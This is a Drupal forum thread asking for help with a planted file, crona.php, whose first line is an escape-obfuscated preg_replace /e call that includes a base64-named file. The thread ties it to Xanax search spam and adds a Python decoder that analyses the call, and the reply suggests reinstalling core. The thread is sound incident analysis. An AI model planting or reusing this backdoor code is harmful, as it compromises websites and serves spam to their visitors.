I noticed today a new file in my root directory called 'crona.php'. It looks very much like 'index.php' except it has some cryptic code at the top:

@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x69\156\x63\154\x75\144\x65\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\134\x31\42\x29\51\x3b","\x4c\63\x64\154\x59\151\x39\60\x63\155\x46\165\x63\62\x6c\60\x61\127\x39\165\x64\130\x4d\165\x62\63\x4a\156\x4c\63\x64\63\x64\171\x39\164\x62\62\x52\61\x62\107\x56\172\x4c\63\x4e\154\x59\130\x4a\152\x61\103\x39\172\x5a\127\x46\171\x59\62\x67\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
include("index.php"); exit;

When I changed the file name (to crona.php.wtf), it resulted in an 'access forbidden' message when trying to bring up the site. Simply changing the file name back resulted in the site coming back.

The above code string was being placed into the index.php file earlier this week, and we thought it was due to someone having access to our FTP user/password. When we changed the FTP password, the index.php file was no longer getting modified. This code results in an ad for Xanax showing up under our site name in search results.

I did a Google search on 'crona.php' and found nothing.

Anyone else seen this kind of thing before?
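As an added example (not code from the post or from Drupal), a small Python analyser that decodes the \xHH and \OOO string escapes PHP itself would decode in the quoted call, pulls out the three preg_replace() arguments, and flags the e modifier, which made preg_replace() run the replacement as PHP code after substituting backreferences (the modifier was removed in PHP 7.0). The quoted call is embedded verbatim as the constructed sample; the evaluation is only simulated as a string, nothing is executed.

```python
import re
from base64 import b64decode

# Constructed sample: the preg_replace() call quoted in the post above, copied verbatim.
SAMPLE = r'''@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x69\156\x63\154\x75\144\x65\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\134\x31\42\x29\51\x3b","\x4c\63\x64\154\x59\151\x39\60\x63\155\x46\165\x63\62\x6c\60\x61\127\x39\165\x64\130\x4d\165\x62\63\x4a\156\x4c\63\x64\63\x64\171\x39\164\x62\62\x52\61\x62\107\x56\172\x4c\63\x4e\154\x59\130\x4a\152\x61\103\x39\172\x5a\127\x46\171\x59\62\x67\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\106\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");'''

# PHP double-quoted string escapes: \xHH (1-2 hex digits), \OOO (1-3 octal digits)
# and the usual single-character escapes.
_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
           'f': '\f', '\\': '\\', '$': '$', '"': '"'}

def php_unescape(s):
    """Decode the escape sequences PHP would decode inside a "..." string literal."""
    def sub(m):
        e = m.group(1)
        if e[0] == 'x':
            return chr(int(e[1:], 16))
        if e[0] in '01234567':
            return chr(int(e, 8) & 0xFF)
        return _SIMPLE[e]
    return _ESC.sub(sub, s)

# preg_replace("pattern", "replacement", "subject") with double-quoted literal arguments.
_ARG = r'"((?:[^"\\]|\\.)*)"'
_CALL = re.compile(r'@?preg_replace\s*\(\s*' + _ARG + r'\s*,\s*' + _ARG + r'\s*,\s*' + _ARG, re.S)

def analyse(src):
    """Decode an escape-obfuscated preg_replace() call and flag the e (eval) modifier."""
    m = _CALL.search(src)
    if not m:
        return None
    pattern, replacement, subject = (php_unescape(g) for g in m.groups())
    delim = pattern[0]                       # PCRE literal: <delim>regex<delim>modifiers
    modifiers = pattern.rsplit(delim, 1)[1]
    # With the e modifier the replacement is executed as PHP after backreference
    # substitution; \1 is the text matched by (.+), i.e. the whole subject string.
    evaluated = replacement.replace('\\1', subject) if 'e' in modifiers else None
    try:
        included = b64decode(subject).decode('latin-1')   # what base64_decode() yields
    except Exception:
        included = None
    return {'pattern': pattern, 'modifiers': modifiers, 'replacement': replacement,
            'eval_modifier': 'e' in modifiers, 'evaluated_code': evaluated,
            'included_path': included}

if __name__ == '__main__':
    for key, value in analyse(SAMPLE).items():
        print(f'{key}: {value!r}')
```

The decoded pattern is `@(.+)@ie` and the replacement is `include(base64_decode("\1"));`, so the one-liner includes whatever file the base64 third argument names; that path is the thing to inspect and remove along with crona.php.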

Comments

jaypan

You may have been hacked. You should re-install core. Download a fresh copy of core, and drop it in over top of all your current core files.

Contact me to contract me for D7 -> D10/11 migrations.